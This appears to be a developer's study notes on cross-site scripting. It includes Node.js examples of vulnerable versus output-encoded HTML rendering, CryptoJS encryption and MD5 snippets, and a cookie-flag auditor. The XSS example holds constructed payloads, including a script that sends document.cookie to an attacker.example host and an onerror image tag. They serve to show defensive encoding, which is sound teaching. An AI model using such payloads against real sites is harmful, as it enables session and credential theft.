Application Security

XSS: Cross-site scripting

https://excess-xss.com/

Flaws that allow these XSS attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

What it steals: the injected script can transmit private data, such as cookies or other session information, to the attacker.

  1. Stored/Persisted XSS
  2. Reflected XSS
  3. DOM-based XSS

Why injected JavaScript is dangerous:
  • JavaScript has access to some of the user's sensitive information, such as cookies.
  • JavaScript can send HTTP requests with arbitrary content to arbitrary destinations by using XMLHttpRequest and other mechanisms.
  • JavaScript can make arbitrary modifications to the HTML of the current page by using DOM manipulation methods.
These facts combined can cause very serious security breaches.
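The three variants above differ only in where the attacker's string enters the page (a stored record, the current request, or a DOM source such as location.hash); for stored and reflected XSS the server-side fix is the same, encode every interpolation for the HTML context it lands in. The following is an added example, not code from the original post or from excess-xss.com. It is written for Node.js with constructed sample data, and the function names (escapeHtml, safeHref, renderPage, tagNames) and the attacker.example host are this example's own.

```javascript
// Added example (not from the original post): reflected and stored XSS arise when
// untrusted strings are concatenated into HTML; contextual output encoding stops
// them. Runs under Node.js; all data below is constructed for the example.

// HTML text and double-quoted attribute contexts: encode the five characters
// that can terminate the current context.
function escapeHtml(str) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// URL attribute context: encoding is not enough, because javascript:alert(1) is a
// well-formed attribute value. Accept absolute http(s) URLs only; anything else
// (other schemes, relative paths, unparsable input) becomes a dead link.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    if (u.protocol === "http:" || u.protocol === "https:") return escapeHtml(u.href);
  } catch (e) {
    // not an absolute URL
  }
  return "#";
}

// Vulnerable rendering: `query` is echoed from the request (reflected XSS) and
// `comments` were stored earlier by other users (stored XSS). Nothing is encoded.
function renderPageUnsafe(query, comments) {
  const items = comments
    .map((c) => `<li><a href="${c.site}">${c.author}</a>: ${c.text}</li>`)
    .join("");
  return `<h1>Results for ${query}</h1><ul>${items}</ul>`;
}

// Hardened rendering: each interpolation is encoded for the context it lands in.
function renderPage(query, comments) {
  const items = comments
    .map((c) => `<li><a href="${safeHref(c.site)}">${escapeHtml(c.author)}</a>: ${escapeHtml(c.text)}</li>`)
    .join("");
  return `<h1>Results for ${escapeHtml(query)}</h1><ul>${items}</ul>`;
}

// Which element names actually ended up in the markup. Comparing this against the
// template's own elements is a cheap test for injected tags.
function tagNames(html) {
  const names = [];
  for (const m of html.matchAll(/<([a-z][a-z0-9]*)/gi)) {
    const n = m[1].toLowerCase();
    if (!names.includes(n)) names.push(n);
  }
  return names;
}

// Constructed payloads: one reflected via the search box, two stored in comments.
const REFLECTED_QUERY =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const STORED_COMMENTS = [
  { author: "alice", site: "https://example.com/alice", text: "Nice article" },
  { author: '"><img src=x onerror=alert(1)>', site: "javascript:alert(document.domain)", text: "pwned" },
];

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe tags:", tagNames(renderPageUnsafe(REFLECTED_QUERY, STORED_COMMENTS)));
  console.log("safe tags:  ", tagNames(renderPage(REFLECTED_QUERY, STORED_COMMENTS)));
}
```

The unsafe render produces script and img elements the template never declared; the hardened render yields only h1, ul, li and a, with the javascript: link replaced by "#". Note that escapeHtml alone would not have saved the href attribute, which is why URL-valued attributes get their own check.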

It's preferable to use createTextNode instead of simply assigning to innerHTML: a text node is never parsed as markup, so whatever the string contains is displayed literally.

Method 1:
Appends the literal text <a href='https://google.com'>HELLO</a> to the page; the browser shows the angle brackets and does not create a link.

document.getElementById("answer-28111412").appendChild(document.createTextNode("<a href='https://google.com'>HELLO</a>"))

Method 2:
Parses the string as HTML, so the page gets a real link with the text HELLO pointing at https://google.com. When the string is attacker-controlled, this assignment is the injection point.

document.getElementById("answer-28111412").innerHTML = "<a href='https://google.com'>HELLO</a>"

Stored/persistent XSS:

Reflected XSS:

DOM-based XSS:

Encryption (CryptoJS AES with a passphrase):

// INIT
var myString   = "https://www.titanesmedellin.com/";
var myPassword = "myPassword";


// PROCESS
// Passing a plain string as the key puts CryptoJS into OpenSSL-compatible passphrase mode:
// it draws a random 8-byte salt, derives key and IV from the passphrase with EVP_BytesToKey
// (a single MD5 pass per block, a very cheap KDF) and encrypts with AES-256-CBC and PKCS#7 padding.
// There is no integrity check, so a modified ciphertext decrypts to garbage instead of failing.
var encrypted = CryptoJS.AES.encrypt(myString, myPassword);   // CipherParams object
var decrypted = CryptoJS.AES.decrypt(encrypted, myPassword);  // WordArray holding the plaintext bytes
document.getElementById("demo0").innerHTML = myString;
// innerHTML calls toString(): for CipherParams that is the OpenSSL format, base64 of "Salted__" + salt + ciphertext
document.getElementById("demo1").innerHTML = encrypted;
// toString() on a WordArray defaults to hex, so demo2 shows hex, not the URL
document.getElementById("demo2").innerHTML = decrypted;
// decode the bytes as UTF-8 to get the original string back
document.getElementById("demo3").innerHTML = decrypted.toString(CryptoJS.enc.Utf8);



Example 2: hashing the password on the client before the form is posted (MD5, not encryption)
<html>
<head>
<title>Encrypt Password on client Side</title>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
<!-- the original loaded md5.js from crypto-js.googlecode.com, which no longer exists; the same rollup is published on cdnjs -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/md5.js"></script>
<script>
// Despite the title, this hashes rather than encrypts: the server receives MD5(password),
// and that unsalted hash is now the credential an attacker needs. It only keeps the typed
// password off the wire; it does not replace HTTPS, and the server must still hash what it
// receives with a proper password hash (bcrypt, scrypt or similar) before storing it.
function encrypt()
{
var pass=document.getElementById('password').value;
if(pass=="")
{
document.getElementById('err').innerHTML='Error: Password is missing';
return false;
}
// CryptoJS.MD5 returns a WordArray; toString() gives the 32-character hex digest
document.getElementById('password').value=CryptoJS.MD5(pass).toString();
return true;
}
</script>
</head>
<body>
<form class="form-signin" method="post" name="signin" id="signin">
<input type="password" name="password" id="password" placeholder="Password" value="" />
<!-- do not copy the plaintext into another field: every input in the form is posted -->
<div style="color:red" id="err"></div>
<input type="submit" name="login" onclick="return encrypt()" value="LOGIN" >
</form>
</body>
</html>

How can you secure your HTTP cookies against XSS attacks?

XSS occurs when the attacker injects executable JavaScript code into the HTML response.
To limit what that script can do with the session cookie, set attributes on the Set-Cookie HTTP header:
  • HttpOnly - the cookie is not exposed to JavaScript through document.cookie, so injected script cannot read it and send it to the attacker. It does not stop the script from issuing requests from the victim's browser, which still carry the cookie.
  • Secure - the browser only sends the cookie over HTTPS, so it is not leaked to a network attacker on a plaintext connection.
So it would look something like this: Set-Cookie: sid=<cookie-value>; HttpOnly; Secure. If you are using Express with the cookie-session middleware, HttpOnly is on by default; set the secure option explicitly for HTTPS deployments rather than relying on the default.
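An added example, not code from the original post, that builds a Set-Cookie header with the two attributes above and audits captured Set-Cookie headers for the ones that are missing. It also checks SameSite, which the post does not mention but which belongs in the same review. The sample headers are constructed, and the function names (buildSessionCookie, parseSetCookie, auditSessionCookie) are this example's own; it runs under Node.js.

```javascript
// Added example (not from the original post): emit a correctly flagged session
// cookie and audit Set-Cookie headers for missing HttpOnly / Secure / SameSite.
// Runs under Node.js; SAMPLE_HEADERS are constructed for the example.

// Build the Set-Cookie header value for a session identifier.
function buildSessionCookie(name, value, { maxAgeSeconds = 3600, sameSite = "Lax" } = {}) {
  // A cookie value must not contain ';', ',', whitespace or control characters;
  // restricting it to base64url characters rules all of those out.
  if (!/^[A-Za-z0-9_-]+$/.test(value)) throw new Error("cookie value must be base64url");
  return [
    `${name}=${value}`,
    "Path=/",
    `Max-Age=${maxAgeSeconds}`,
    "HttpOnly",
    "Secure",
    `SameSite=${sameSite}`,
  ].join("; ");
}

// Parse one Set-Cookie header into { name, value, attrs }; attribute names are
// lowercased because they are case-insensitive, flag attributes map to true.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? "" : pair.slice(eq + 1);
  const attrs = {};
  for (const a of rest) {
    if (!a) continue;
    const i = a.indexOf("=");
    const k = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[k] = i === -1 ? true : a.slice(i + 1);
  }
  return { name, value, attrs };
}

// Return the list of problems for a cookie that carries a session identifier.
function auditSessionCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const problems = [];
  if (!attrs.httponly) problems.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  if (!attrs.secure) problems.push(`${name}: missing Secure (sent over plaintext HTTP)`);
  if (!attrs.samesite) problems.push(`${name}: missing SameSite (attached to cross-site requests)`);
  return problems;
}

// Constructed headers: two as a careless server might emit them, one built above.
const SAMPLE_HEADERS = [
  "sid=abc123; Path=/",
  "sid=abc123; Path=/; HttpOnly",
  buildSessionCookie("sid", "abc123"),
];

if (typeof require !== "undefined" && require.main === module) {
  for (const h of SAMPLE_HEADERS) {
    console.log(h);
    console.log("  ", auditSessionCookie(h).join("; ") || "ok");
  }
}
```

Pointing auditSessionCookie at the Set-Cookie headers of a real login response is a quick check to add to an integration test; the first two samples fail it, the built header passes.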

SSL:
